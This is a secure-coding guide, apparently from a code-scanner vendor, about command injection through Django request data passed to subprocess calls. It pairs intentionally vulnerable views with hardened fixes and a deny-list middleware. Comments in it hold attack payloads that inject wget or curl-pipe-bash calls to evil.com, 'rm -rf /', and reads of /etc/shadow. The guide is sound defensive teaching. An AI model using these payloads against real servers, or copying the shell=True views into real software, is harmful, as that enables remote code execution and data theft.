Command injection from HTTP request data in subprocess call in Django

Critical Risk command-injection
python · django · command-injection · subprocess · http-request · shell · rce

What it is

A critical security vulnerability where user-controlled request data is passed to subprocess execution, often with shell parsing or dynamic command construction, enabling injection of additional commands or arguments. Command injection could let attackers run arbitrary OS commands, leading to server compromise, data exfiltration, and lateral movement.

# VULNERABLE: Django views with subprocess injection
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import subprocess
import json

# VULNERABLE: File operations endpoint
@csrf_exempt
def file_operations(request):
    """Intentionally vulnerable example: run file commands built from POST data.

    On POST, reads ``operation``, ``filename`` and ``options`` from the form
    body and interpolates them, unvalidated, into a shell command string
    (``cat``, ``grep`` or ``cp``) that is executed with ``shell=True``.
    Any other HTTP method renders ``file_ops.html``.

    Returns a ``JsonResponse`` carrying the command's success flag, stdout
    and stderr, or an ``error`` key when a parameter is missing, the
    operation is unknown, or an exception is raised.

    Do not copy this code: every interpolated value is attacker-controlled,
    and ``@csrf_exempt`` additionally removes CSRF protection from the view.
    """
    if request.method == 'POST':
        operation = request.POST.get('operation', '')
        filename = request.POST.get('filename', '')
        # Only consumed by the 'backup' branch below.
        options = request.POST.get('options', '')
        
        if not operation or not filename:
            # No explicit HTTP status is passed for this error response.
            return JsonResponse({'error': 'Missing parameters'})
        
        try:
            # VULNERABLE: User input in subprocess with shell
            if operation == 'view':
                result = subprocess.run(
                    f'cat {filename}',
                    shell=True,
                    capture_output=True,
                    text=True
                )
            elif operation == 'search':
                pattern = request.POST.get('pattern', '')
                # DANGEROUS: Multiple user inputs
                # The double quotes around the pattern do not help: the shell
                # still expands $(...) and backticks inside them, and a '"'
                # in the value closes the quoting.
                result = subprocess.run(
                    f'grep "{pattern}" {filename}',
                    shell=True,
                    capture_output=True,
                    text=True
                )
            elif operation == 'backup':
                destination = request.POST.get('destination', '/backup/')
                # VULNERABLE: Command construction with user data
                cmd = f'cp {options} {filename} {destination}'
                result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            else:
                return JsonResponse({'error': 'Unknown operation'})
            
            # stdout/stderr of the executed command are returned to the client.
            return JsonResponse({
                'success': result.returncode == 0,
                'output': result.stdout,
                'error': result.stderr
            })
            
        except Exception as e:
            # The exception text is returned to the client verbatim.
            return JsonResponse({'error': str(e)})
    
    return render(request, 'file_ops.html')

# VULNERABLE: System administration
@csrf_exempt
def system_admin(request):
    """Intentionally vulnerable example: execute an arbitrary command from POST data.

    On POST, joins the ``command`` and ``args`` form fields into one string
    and runs it through the shell with a 30-second timeout. Any other HTTP
    method renders ``admin.html``.

    Returns a ``JsonResponse`` with the executed command line, its stdout,
    stderr and return code, or an ``error`` key on timeout or any other
    exception.

    Do not copy this code: the caller chooses the entire command line, and
    the view performs no authentication or permission check of its own.
    """
    if request.method == 'POST':
        command = request.POST.get('command', '')
        args = request.POST.get('args', '')
        
        # EXTREMELY DANGEROUS: Direct command execution
        full_command = f'{command} {args}'
        
        try:
            result = subprocess.run(
                full_command,
                shell=True,
                capture_output=True,
                text=True,
                timeout=30
            )
            
            # The executed command line is returned together with its output.
            return JsonResponse({
                'command': full_command,
                'output': result.stdout,
                'error': result.stderr,
                'returncode': result.returncode
            })
            
        except subprocess.TimeoutExpired:
            return JsonResponse({'error': 'Command timeout'})
        except Exception as e:
            # The exception text is returned to the client verbatim.
            return JsonResponse({'error': str(e)})
    
    return render(request, 'admin.html')

# VULNERABLE: Log analysis
def analyze_logs(request):
    """Intentionally vulnerable example: tail and grep a log via the shell.

    Reads ``file``, ``filter`` and ``lines`` from the query string and
    interpolates them into a ``tail -n ... | grep ...`` pipeline executed
    with ``shell=True``. The view does not check the HTTP method, so the
    command runs for every request.

    Returns a ``JsonResponse`` echoing the inputs plus the pipeline's
    stdout, or an ``error`` key if an exception is raised.

    Do not copy this code: all three parameters are attacker-controlled.
    """
    log_file = request.GET.get('file', '/var/log/app.log')
    filter_pattern = request.GET.get('filter', '')
    # Kept as a string and never checked to be numeric before interpolation.
    lines = request.GET.get('lines', '100')
    
    # VULNERABLE: GET parameters in shell command
    command = f'tail -n {lines} {log_file}'
    
    if filter_pattern:
        # The pipe only works because the command is run by a shell.
        command += f' | grep "{filter_pattern}"'
    
    try:
        result = subprocess.run(
            command,
            shell=True,
            capture_output=True,
            text=True
        )
        
        # stderr and the return code are discarded; only stdout is returned.
        return JsonResponse({
            'log_file': log_file,
            'lines_analyzed': lines,
            'filter': filter_pattern,
            'output': result.stdout
        })
        
    except Exception as e:
        return JsonResponse({'error': str(e)})

# URLs configuration
from django.urls import path

# Route table exposing the three vulnerable example views defined above.
urlpatterns = [
    path('file-ops/', file_operations, name='file_operations'),
    # NOTE(review): 'admin/' is the prefix conventionally used for the Django
    # admin site; confirm there is no clash in a real project.
    path('admin/', system_admin, name='system_admin'),
    path('logs/', analyze_logs, name='analyze_logs'),
]

# Attack examples:
# POST /file-ops/ operation=view&filename=/etc/passwd; wget evil.com/steal
# POST /file-ops/ operation=search&pattern=test&filename=data.txt; rm -rf /
# POST /admin/ command=ls&args=-la; curl evil.com/backdoor | bash
# GET /logs/?file=/var/log/app.log; cat /etc/shadow&filter=error
# SECURE: Django views without subprocess injection
from django.http import JsonResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import permission_required
from django.core.exceptions import ValidationError
from django import forms
import os
import hashlib
from pathlib import Path
import re
import logging

logger = logging.getLogger(__name__)

# SECURE: Form validation
class FileOperationForm(forms.Form):
    """Form that whitelists the file operation and validates the file name."""

    OPERATION_CHOICES = [
        ('info', 'File Information'),
        ('hash', 'Calculate Hash'),
        ('lines', 'Count Lines'),
        ('size', 'File Size')
    ]

    operation = forms.ChoiceField(choices=OPERATION_CHOICES)
    filename = forms.CharField(max_length=255)

    def clean_filename(self):
        """Return the submitted file name, or raise ValidationError if unsafe.

        The checks run in a fixed order (character set, length, dot rules) so
        the first failing rule determines the error message.
        """
        candidate = self.cleaned_data['filename']

        # Character whitelist: letters, digits, dot, underscore, hyphen.
        if re.match(r'^[a-zA-Z0-9._-]+$', candidate) is None:
            raise ValidationError('Invalid filename format')

        # Length cap, mirroring the field's max_length.
        if len(candidate) > 255:
            raise ValidationError('Filename too long')

        # Reject hidden files and anything containing a parent-directory marker.
        if candidate.startswith('.') or '..' in candidate:
            raise ValidationError('Invalid filename')

        return candidate

class LogAnalysisForm(forms.Form):
    """Form that restricts log analysis to a fixed set of log files."""

    LOG_FILE_CHOICES = [
        ('/var/log/app.log', 'Application Log'),
        ('/var/log/error.log', 'Error Log'),
        ('/var/log/access.log', 'Access Log')
    ]

    log_file = forms.ChoiceField(choices=LOG_FILE_CHOICES)
    filter_pattern = forms.CharField(max_length=100, required=False)
    lines = forms.IntegerField(min_value=1, max_value=1000, initial=100)

    def clean_filter_pattern(self):
        """Return the optional filter text, rejecting unexpected characters.

        An empty filter is accepted unchanged; a non-empty one may contain
        only letters, digits, whitespace, dot, underscore and hyphen.
        """
        text = self.cleaned_data.get('filter_pattern', '')

        # Allow only alphanumeric and basic characters
        if text and not re.match(r'^[a-zA-Z0-9\s._-]+$', text):
            raise ValidationError('Invalid filter pattern')

        return text

# SECURE: File processor using native Python
class SecureFileProcessor:
    """Read-only file inspection implemented with native Python calls.

    Every operation is confined to ``safe_directory`` and to files no larger
    than ``max_file_size`` bytes. No external process is ever started.
    """

    def __init__(self):
        self.safe_directory = Path('/secure/uploads')
        self.max_file_size = 10 * 1024 * 1024  # 10MB

    def process_file(self, operation, filename):
        """Run ``operation`` on ``filename`` and return its result dict.

        Args:
            operation: One of ``'info'``, ``'hash'``, ``'lines'``, ``'size'``.
            filename: File name relative to ``safe_directory``.

        Raises:
            ValueError: Unknown operation, path outside the safe directory,
                or file too large.
            FileNotFoundError: The file does not exist.
        """
        # Get validated file path
        file_path = self.get_safe_file_path(filename)

        operations = {
            'info': self.get_file_info,
            'hash': self.calculate_hash,
            'lines': self.count_lines,
            'size': self.get_file_size
        }

        handler = operations.get(operation)
        if handler is None:
            # Raise the error type callers already handle instead of a bare
            # KeyError from the dispatch table.
            raise ValueError('Operation not supported')

        return handler(file_path)

    def get_safe_file_path(self, filename):
        """Resolve ``filename`` inside the safe directory and validate it.

        Returns:
            The resolved ``Path`` of an existing file within size limits.

        Raises:
            ValueError: The resolved path escapes ``safe_directory`` or the
                file exceeds ``max_file_size``.
            FileNotFoundError: The file does not exist.
        """
        base_dir = self.safe_directory.resolve()
        file_path = (base_dir / filename).resolve()

        # Compare path components, not string prefixes: a prefix test would
        # accept a sibling such as '<safe_directory>_evil/secret'.
        try:
            file_path.relative_to(base_dir)
        except ValueError:
            raise ValueError('File not in safe directory') from None

        if not file_path.exists():
            raise FileNotFoundError('File not found')

        if file_path.stat().st_size > self.max_file_size:
            raise ValueError('File too large')

        return file_path

    def get_file_info(self, file_path):
        """Return name, size, mtime, permission bits and extension."""
        stat = file_path.stat()
        return {
            'name': file_path.name,
            'size': stat.st_size,
            'modified': stat.st_mtime,
            # Last three octal digits, i.e. the rwx bits for user/group/other.
            'permissions': oct(stat.st_mode)[-3:],
            'extension': file_path.suffix
        }

    def calculate_hash(self, file_path):
        """Return the MD5 and SHA-256 hex digests and the byte size of the file."""
        md5 = hashlib.md5()
        sha256 = hashlib.sha256()
        total = 0

        # Stream in chunks so memory use does not depend on the file size.
        with open(file_path, 'rb') as f:
            for chunk in iter(lambda: f.read(65536), b''):
                md5.update(chunk)
                sha256.update(chunk)
                total += len(chunk)

        return {
            'md5': md5.hexdigest(),
            'sha256': sha256.hexdigest(),
            'size': total
        }

    def count_lines(self, file_path):
        """Return the number of lines, decoding the file as UTF-8."""
        with open(file_path, 'r', encoding='utf-8') as f:
            lines = sum(1 for _ in f)

        return {'lines': lines}

    def get_file_size(self, file_path):
        """Return the size in bytes and as a human-readable string."""
        size = file_path.stat().st_size
        return {
            'size_bytes': size,
            'size_human': self.format_size(size)
        }

    def format_size(self, size):
        """Format a byte count with two decimals and a B/KB/MB/GB/TB unit."""
        units = ['B', 'KB', 'MB', 'GB']
        for unit in units:
            if size < 1024:
                return f'{size:.2f} {unit}'
            size /= 1024
        return f'{size:.2f} TB'

# SECURE: Log analyzer using native Python
class SecureLogAnalyzer:
    """Tail and filter a whitelisted log file using native Python only."""

    def __init__(self):
        # Maps each permitted log path to its display name.
        self.allowed_log_files = {
            '/var/log/app.log': 'Application Log',
            '/var/log/error.log': 'Error Log',
            '/var/log/access.log': 'Access Log'
        }

    def analyze_log(self, log_file, filter_pattern, lines):
        """Return the last ``lines`` lines of ``log_file`` that match the filter.

        Args:
            log_file: Path that must be a key of ``allowed_log_files``.
            filter_pattern: Case-insensitive substring to look for; an empty
                value disables filtering.
            lines: Positive number of trailing lines to inspect.

        Returns:
            Dict with ``log_file``, ``total_lines`` (number of matches),
            ``filter_applied`` and the matching ``lines`` (stripped).

        Raises:
            ValueError: Log file not whitelisted, ``lines`` not positive, or
                the file is not valid UTF-8.
            FileNotFoundError: The log file does not exist.
        """
        from collections import deque

        if log_file not in self.allowed_log_files:
            raise ValueError('Log file not allowed')

        # A zero count used to fall through to "the whole file" because
        # seq[-0:] is the full sequence; reject it explicitly instead.
        if lines < 1:
            raise ValueError('Line count must be a positive integer')

        needle = filter_pattern.lower() if filter_pattern else ''

        try:
            with open(log_file, 'r', encoding='utf-8') as f:
                # A bounded deque keeps only the newest N lines while the
                # file is streamed, so memory use is independent of log size.
                recent_lines = deque(f, maxlen=lines)
        except FileNotFoundError:
            # Opening directly (instead of checking existence first) avoids a
            # race between the check and the read.
            raise FileNotFoundError('Log file not found') from None
        except UnicodeDecodeError as exc:
            raise ValueError('Log file contains invalid characters') from exc

        matching_lines = [
            line.strip()
            for line in recent_lines
            if not needle or needle in line.lower()
        ]

        return {
            'log_file': log_file,
            'total_lines': len(matching_lines),
            'filter_applied': bool(filter_pattern),
            'lines': matching_lines
        }

# Initialize processors
# Module-level instances created once at import time and used by the views
# below (secure_file_operations and secure_log_analysis).
file_processor = SecureFileProcessor()
log_analyzer = SecureLogAnalyzer()

# SECURE: Views with proper validation
@csrf_protect
@permission_required('app.can_manage_files')
def secure_file_operations(request):
    """Validate a file-operation form and run it through ``file_processor``.

    Non-POST requests render the empty form. POST requests return a
    ``JsonResponse`` with ``success`` plus either the operation result, the
    form errors, or an error message.
    """
    if request.method != 'POST':
        # GET request - show form
        blank_form = FileOperationForm()
        return render(request, 'secure_file_ops.html', {'form': blank_form})

    form = FileOperationForm(request.POST)

    if not form.is_valid():
        return JsonResponse({
            'success': False,
            'errors': form.errors
        })

    try:
        cleaned = form.cleaned_data
        outcome = file_processor.process_file(
            cleaned['operation'],
            cleaned['filename']
        )

        # Log successful operation
        logger.info(f'File operation {form.cleaned_data["operation"]} '
                   f'on {form.cleaned_data["filename"]} by {request.user}')

        payload = {
            'success': True,
            'operation': form.cleaned_data['operation'],
            'result': outcome
        }
        return JsonResponse(payload)

    except (ValueError, FileNotFoundError) as e:
        # Expected validation failures: their message is shown to the caller.
        return JsonResponse({
            'success': False,
            'error': str(e)
        })
    except Exception as e:
        # Anything else is logged in full and reported generically.
        logger.exception(f'File operation error: {e}')
        return JsonResponse({
            'success': False,
            'error': 'Operation failed'
        })

@csrf_protect
@permission_required('app.can_view_logs')
def secure_log_analysis(request):
    """Validate a log-analysis form and run it through ``log_analyzer``.

    Non-POST requests render the empty form. POST requests return a
    ``JsonResponse`` with ``success`` plus either the analysis result, the
    form errors, or an error message.
    """
    if request.method != 'POST':
        # GET request
        blank_form = LogAnalysisForm()
        return render(request, 'secure_log_analysis.html', {'form': blank_form})

    form = LogAnalysisForm(request.POST)

    if not form.is_valid():
        return JsonResponse({
            'success': False,
            'errors': form.errors
        })

    try:
        cleaned = form.cleaned_data
        analysis = log_analyzer.analyze_log(
            cleaned['log_file'],
            cleaned['filter_pattern'],
            cleaned['lines']
        )

        # Log access
        logger.info(f'Log analysis on {form.cleaned_data["log_file"]} '
                   f'by {request.user}')

        payload = {
            'success': True,
            'result': analysis
        }
        return JsonResponse(payload)

    except (ValueError, FileNotFoundError) as e:
        # Expected validation failures: their message is shown to the caller.
        return JsonResponse({
            'success': False,
            'error': str(e)
        })
    except Exception as e:
        # Anything else is logged in full and reported generically.
        logger.exception(f'Log analysis error: {e}')
        return JsonResponse({
            'success': False,
            'error': 'Analysis failed'
        })

# Health check endpoint
def health_check(request):
    """Return a static JSON document describing service status and features."""
    supported_operations = ['info', 'hash', 'lines', 'size']
    features = [
        'Input validation',
        'CSRF protection',
        'Permission checks',
        'Native Python operations',
        'No subprocess execution'
    ]

    payload = {
        'status': 'healthy',
        'available_operations': supported_operations,
        'security_features': features
    }
    return JsonResponse(payload)

# SECURE: URLs with proper naming
from django.urls import path

# Route table for the hardened views; there is no route that executes
# caller-supplied commands.
urlpatterns = [
    path('file-ops/', secure_file_operations, name='secure_file_operations'),
    path('logs/', secure_log_analysis, name='secure_log_analysis'),
    # health_check carries no csrf_protect or permission_required decorator.
    path('health/', health_check, name='health_check'),
]

💡 Why This Fix Works

The vulnerable code uses subprocess.run() with shell=True and user input from Django requests, allowing command injection through form data and URL parameters. The secure version eliminates subprocess usage entirely, implements Django forms with validation, uses native Python file operations, and includes proper authentication and authorization checks.

Why it happens

Using Django request parameters (GET, POST, or path parameters) directly in subprocess.run() calls with shell=True or dynamic command construction. This allows attackers to inject shell metacharacters through HTTP requests.

Root causes

Request Parameters in subprocess.run()

Using Django request parameters (GET, POST, or path parameters) directly in subprocess.run() calls with shell=True or dynamic command construction. This allows attackers to inject shell metacharacters through HTTP requests.

Preview example – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import subprocess

# VULNERABLE: Request data in subprocess
@csrf_exempt
def process_file(request):
    """Intentionally vulnerable example: run ``<operation> <filename>`` in a shell.

    ``filename`` is read from the query string and ``operation`` from the
    POST body (defaulting to ``'cat'``); both are interpolated unvalidated
    into a command executed with ``shell=True``. The view does not check the
    HTTP method.

    Returns a ``JsonResponse`` containing the command's stdout.

    Do not copy this code: the caller controls both the program that runs
    and its arguments.
    """
    filename = request.GET.get('filename', '')
    operation = request.POST.get('operation', 'cat')
    
    # DANGEROUS: User input in shell command
    result = subprocess.run(
        f'{operation} {filename}',
        shell=True,
        capture_output=True,
        text=True
    )
    
    # stderr and the return code are discarded.
    return JsonResponse({'output': result.stdout})

# Attack: GET /?filename=/etc/passwd; wget evil.com/steal
# Attack: POST operation=cat; rm -rf /; echo

Form Data in Command Construction

Processing Django form data and using it to build subprocess commands without proper validation. Form fields can contain shell metacharacters that alter command execution.

Preview example – PYTHON
from django.shortcuts import render
from django.http import JsonResponse
import subprocess

# VULNERABLE: Form processing with subprocess
def backup_handler(request):
    """Intentionally vulnerable example: build a ``cp`` argument list from form data.

    On POST, splits the ``options`` field on whitespace and places the
    pieces, followed by ``source`` and ``destination``, after ``'cp'`` in an
    argument list run without a shell. Any other HTTP method renders
    ``backup.html``.

    Returns a ``JsonResponse`` with a ``success`` flag derived from the
    return code and a fixed message.

    Do not copy this code: no shell is involved, so metacharacters are not
    interpreted, but the caller can still inject arbitrary ``cp`` options
    and choose arbitrary source and destination paths.
    """
    if request.method == 'POST':
        # No default is given, so these are None when the field is absent.
        source = request.POST.get('source')
        destination = request.POST.get('destination')
        options = request.POST.get('options', '')
        
        # DANGEROUS: Form data in command
        command = ['cp'] + options.split() + [source, destination]
        
        # Still vulnerable with argument injection
        result = subprocess.run(command, capture_output=True)
        
        # The message is the same whether or not the copy succeeded.
        return JsonResponse({
            'success': result.returncode == 0,
            'message': 'Backup completed'
        })
    
    return render(request, 'backup.html')

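# Note: no shell is involved here, so ';' is passed to cp literally and does
# not start a second command. The risk is option and path injection instead:
# Attack: options='--target-directory=/var/www/static' (copies into a served directory)
# Attack: source='/etc/passwd', destination='/var/www/static/passwd.txt'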

Fixes

1

Use Django Forms with Validation

Implement Django forms with comprehensive validation, and call subprocess with an argument list and shell=False. This both prevents shell injection and ensures that input is properly validated.

View implementation – PYTHON
from django import forms
from django.http import JsonResponse
from django.shortcuts import render
import subprocess
from pathlib import Path
import re

# SECURE: Django form with validation
class FileProcessForm(forms.Form):
    """Form that whitelists the operation and validates the file name."""

    OPERATION_CHOICES = [
        ('info', 'File Info'),
        ('count', 'Line Count'),
        ('checksum', 'Calculate Hash')
    ]

    operation = forms.ChoiceField(choices=OPERATION_CHOICES)
    filename = forms.CharField(max_length=255)

    def clean_filename(self):
        """Return the submitted file name, or raise ValidationError if unsafe."""
        candidate = self.cleaned_data['filename']

        # Strict filename validation
        if re.match(r'^[a-zA-Z0-9._-]+$', candidate) is None:
            raise forms.ValidationError('Invalid filename format')

        # A '..' sequence anywhere is treated as a traversal attempt.
        if '..' in candidate:
            raise forms.ValidationError('Directory traversal not allowed')

        return candidate

def secure_file_process(request):
    """Validate the form and run the requested whitelisted file operation.

    Non-POST requests render the empty form. POST requests return a
    ``JsonResponse`` with ``success`` plus the result, the form errors, or a
    generic failure message.
    """
    if request.method != 'POST':
        return render(request, 'file_process.html', {'form': FileProcessForm()})

    form = FileProcessForm(request.POST)

    if not form.is_valid():
        return JsonResponse({
            'success': False,
            'errors': form.errors
        })

    try:
        cleaned = form.cleaned_data
        output = execute_safe_operation(
            cleaned['operation'],
            cleaned['filename']
        )
        return JsonResponse({'success': True, 'result': output})
    except Exception:
        # Details are deliberately withheld from the client.
        return JsonResponse({
            'success': False,
            'error': 'Operation failed'
        })

def execute_safe_operation(operation, filename):
    """Run a whitelisted read-only command on a file inside the safe directory.

    Args:
        operation: One of ``'info'``, ``'count'`` or ``'checksum'``.
        filename: File name relative to ``/safe/uploads``.

    Returns:
        The command's standard output with surrounding whitespace removed.

    Raises:
        ValueError: The path escapes the safe directory, the file does not
            exist, or the operation is not supported.
        RuntimeError: The command exited with a non-zero status.
        subprocess.TimeoutExpired: The command ran longer than 30 seconds.
    """
    # Validate file path
    # Resolve the base too, so both sides of the comparison are canonical.
    safe_dir = Path('/safe/uploads').resolve()
    file_path = (safe_dir / filename).resolve()

    # Ensure file is within safe directory
    # Compare path components, not string prefixes: a prefix test would
    # accept a sibling such as '/safe/uploads_evil/secret'.
    try:
        file_path.relative_to(safe_dir)
    except ValueError:
        raise ValueError('File not in safe directory') from None

    if not file_path.exists():
        raise ValueError('File not found')

    # Map operations to safe commands
    # The path is absolute, so it cannot be mistaken for an option.
    commands = {
        'info': ['file', str(file_path)],
        'count': ['wc', '-l', str(file_path)],
        'checksum': ['sha256sum', str(file_path)]
    }

    if operation not in commands:
        raise ValueError('Operation not supported')

    # SECURE: subprocess with argument array, no shell
    result = subprocess.run(
        commands[operation],
        capture_output=True,
        text=True,
        timeout=30
    )

    if result.returncode != 0:
        raise RuntimeError('Command failed')

    return result.stdout.strip()
2

Implement Django Middleware for Security

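Create custom Django middleware that validates all request data and rejects suspicious values before they reach views. This provides a centralized security layer. Treat it as defense in depth only: deny-list pattern matching can be bypassed and can also reject legitimate input, so it must not replace per-view validation and shell-free subprocess calls.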

View implementation – PYTHON
from django.http import JsonResponse
from django.utils.deprecation import MiddlewareMixin
import re
import logging

logger = logging.getLogger(__name__)

class SecurityValidationMiddleware(MiddlewareMixin):
    """Middleware to validate request data for security issues.

    Rejects, with HTTP 400, any request whose GET or POST values match one
    of ``DANGEROUS_PATTERNS``. This is a deny-list and therefore only a
    defense-in-depth layer; views must still validate their own input.
    """

    DANGEROUS_PATTERNS = [
        r'[;&|`$(){}\[\]<>]',  # Shell metacharacters
        r'\.\./',              # Directory traversal
        r'\\x[0-9a-fA-F]{2}',  # Hex encoding
        r'\\[0-7]{3}',         # Octal encoding
        r'%[0-9a-fA-F]{2}',    # URL encoding of dangerous chars
        r'(rm|del|format)\s',  # Dangerous commands
        r'(exec|eval)\s*\(',   # Code execution
    ]

    def process_request(self, request):
        """Return a 400 ``JsonResponse`` for suspicious input, else ``None``.

        Returning ``None`` lets request processing continue as normal.
        """
        # Skip validation for certain paths
        skip_paths = ('/admin/', '/static/', '/media/')
        if request.path.startswith(skip_paths):
            return None

        sources = [('GET', request.GET, 'Invalid request parameters')]
        if hasattr(request, 'POST'):
            sources.append(('POST', request.POST, 'Invalid form data'))

        for label, params, message in sources:
            # lists() yields every value of a repeated key. items() would
            # expose only the last one, letting '?a=;rm&a=ok' slip through
            # to a view that reads the values with getlist().
            for key, values in params.lists():
                if any(self.contains_dangerous_pattern(v) for v in values):
                    # %r escapes control characters so attacker-supplied
                    # newlines cannot forge additional log lines.
                    logger.warning(
                        'Dangerous pattern in %s %r: %r', label, key, values
                    )
                    return JsonResponse({'error': message}, status=400)

        return None

    def contains_dangerous_pattern(self, value):
        """Return True if ``value`` is a string matching any deny-list pattern."""
        if not isinstance(value, str):
            return False

        return any(
            re.search(pattern, value, re.IGNORECASE)
            for pattern in self.DANGEROUS_PATTERNS
        )

# Add to settings.py:
# MIDDLEWARE = [
#     'myapp.middleware.SecurityValidationMiddleware',
#     # ... other middleware
# ]
3

Use Native Python Libraries

Replace subprocess calls with native Python libraries and Django utilities. This eliminates command injection risks entirely while providing better integration with Django.

View implementation – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from django.core.files.storage import default_storage
from django.conf import settings
import hashlib
import os
from pathlib import Path

# SECURE: Native Python file operations
class DjangoFileProcessor:
    """Read-only file inspection implemented with native Python calls.

    Every operation is confined to ``safe_directory`` (``uploads`` under
    ``settings.MEDIA_ROOT``) and to files no larger than ``max_file_size``
    bytes. No external process is ever started.
    """

    def __init__(self):
        self.safe_directory = Path(settings.MEDIA_ROOT) / 'uploads'
        self.max_file_size = 10 * 1024 * 1024  # 10MB

    def process_file(self, operation, filename):
        """Process file using native Python operations.

        Args:
            operation: One of ``'info'``, ``'hash'``, ``'lines'``, ``'size'``.
            filename: Bare file name inside ``safe_directory``.

        Returns:
            The result dict of the selected operation.

        Raises:
            ValueError: Invalid file name, path outside the safe directory,
                file too large, or unsupported operation.
            FileNotFoundError: The file does not exist.
        """
        # Validate filename
        if not self.is_valid_filename(filename):
            raise ValueError('Invalid filename')

        # Resolve file path safely
        file_path = self.get_safe_file_path(filename)

        # Execute operation
        operations = {
            'info': self.get_file_info,
            'hash': self.calculate_hash,
            'lines': self.count_lines,
            'size': self.get_file_size
        }

        if operation not in operations:
            raise ValueError('Operation not supported')

        return operations[operation](file_path)

    def is_valid_filename(self, filename):
        """Validate filename format.

        Returns True only for a string of at most 255 characters made of
        letters, digits, dot, underscore and hyphen that does not start with
        a dot and contains no ``..`` sequence.
        """
        import re

        if not isinstance(filename, str):
            return False

        # Allow only safe characters
        # fullmatch is required here: match() with a trailing '$' also
        # accepts a name that ends in a newline.
        pattern = r'[a-zA-Z0-9._-]+'

        return (re.fullmatch(pattern, filename) is not None and
                len(filename) <= 255 and
                not filename.startswith('.') and
                '..' not in filename)

    def get_safe_file_path(self, filename):
        """Get validated file path within safe directory.

        Raises:
            ValueError: The resolved path escapes ``safe_directory`` or the
                file exceeds ``max_file_size``.
            FileNotFoundError: The file does not exist.
        """
        base_dir = self.safe_directory.resolve()
        file_path = (base_dir / filename).resolve()

        # Ensure file is within safe directory
        # Compare path components, not string prefixes: a prefix test would
        # accept a sibling such as '<safe_directory>_evil/secret'.
        try:
            file_path.relative_to(base_dir)
        except ValueError:
            raise ValueError('File path outside safe directory') from None

        if not file_path.exists():
            raise FileNotFoundError('File not found')

        if file_path.stat().st_size > self.max_file_size:
            raise ValueError('File too large')

        return file_path

    def get_file_info(self, file_path):
        """Get file information using native Python"""
        stat = file_path.stat()

        return {
            'name': file_path.name,
            'size': stat.st_size,
            'size_human': self.format_size(stat.st_size),
            'modified': stat.st_mtime,
            # Last three octal digits, i.e. the rwx bits for user/group/other.
            'permissions': oct(stat.st_mode)[-3:],
            'is_readable': os.access(file_path, os.R_OK),
            'extension': file_path.suffix
        }

    def calculate_hash(self, file_path):
        """Calculate file hash using native Python"""
        hash_algorithms = ['md5', 'sha1', 'sha256']
        hashers = {name: hashlib.new(name) for name in hash_algorithms}
        total = 0

        # Stream in chunks so memory use does not depend on the file size.
        with open(file_path, 'rb') as f:
            for chunk in iter(lambda: f.read(65536), b''):
                total += len(chunk)
                for hasher in hashers.values():
                    hasher.update(chunk)

        return {
            'file': file_path.name,
            'size': total,
            'hashes': {name: h.hexdigest() for name, h in hashers.items()}
        }

    def count_lines(self, file_path):
        """Count lines using native Python"""
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                line_count = sum(1 for _ in f)

            return {
                'file': file_path.name,
                'lines': line_count,
                'encoding': 'utf-8'
            }
        except UnicodeDecodeError:
            # Try with different encoding
            # latin-1 maps every byte to a character, so this cannot fail.
            with open(file_path, 'r', encoding='latin-1') as f:
                line_count = sum(1 for _ in f)

            return {
                'file': file_path.name,
                'lines': line_count,
                'encoding': 'latin-1',
                'note': 'File contains non-UTF8 characters'
            }

    def get_file_size(self, file_path):
        """Get file size information"""
        size = file_path.stat().st_size

        return {
            'file': file_path.name,
            'size_bytes': size,
            'size_human': self.format_size(size)
        }

    def format_size(self, size_bytes):
        """Format file size in human readable format"""
        units = ['B', 'KB', 'MB', 'GB', 'TB']
        size = float(size_bytes)
        unit_index = 0

        # Stop at the largest unit instead of running off the list.
        while size >= 1024 and unit_index < len(units) - 1:
            size /= 1024
            unit_index += 1

        return f'{size:.2f} {units[unit_index]}'

# Django view using native operations
# Module-level instance created once at import time and used by
# native_file_process below.
processor = DjangoFileProcessor()

@csrf_protect
@login_required
def native_file_process(request):
    """Process files using native Python operations.

    Non-POST requests return a JSON description of the available operations
    and limits. POST requests run the requested operation and return a JSON
    result with a ``success`` flag.
    """
    if request.method != 'POST':
        # GET request - show available operations
        return JsonResponse({
            'available_operations': ['info', 'hash', 'lines', 'size'],
            'max_file_size': processor.max_file_size,
            'safe_directory': str(processor.safe_directory)
        })

    operation = request.POST.get('operation')
    filename = request.POST.get('filename')

    # Both fields are mandatory; an empty string counts as missing.
    if not (operation and filename):
        return JsonResponse({
            'success': False,
            'error': 'Operation and filename required'
        })

    try:
        outcome = processor.process_file(operation, filename)

        payload = {
            'success': True,
            'operation': operation,
            'result': outcome
        }
        return JsonResponse(payload)

    except (ValueError, FileNotFoundError) as e:
        # Expected validation failures: their message is shown to the caller.
        return JsonResponse({
            'success': False,
            'error': str(e)
        })
    except Exception as e:
        # Log the error but don't expose details
        logger.exception(f'File processing error: {e}')
        return JsonResponse({
            'success': False,
            'error': 'Processing failed'
        })

Detect This Vulnerability in Your Code

Sourcery automatically identifies command injection from HTTP request data in subprocess calls in Django, along with many other security issues in your codebase.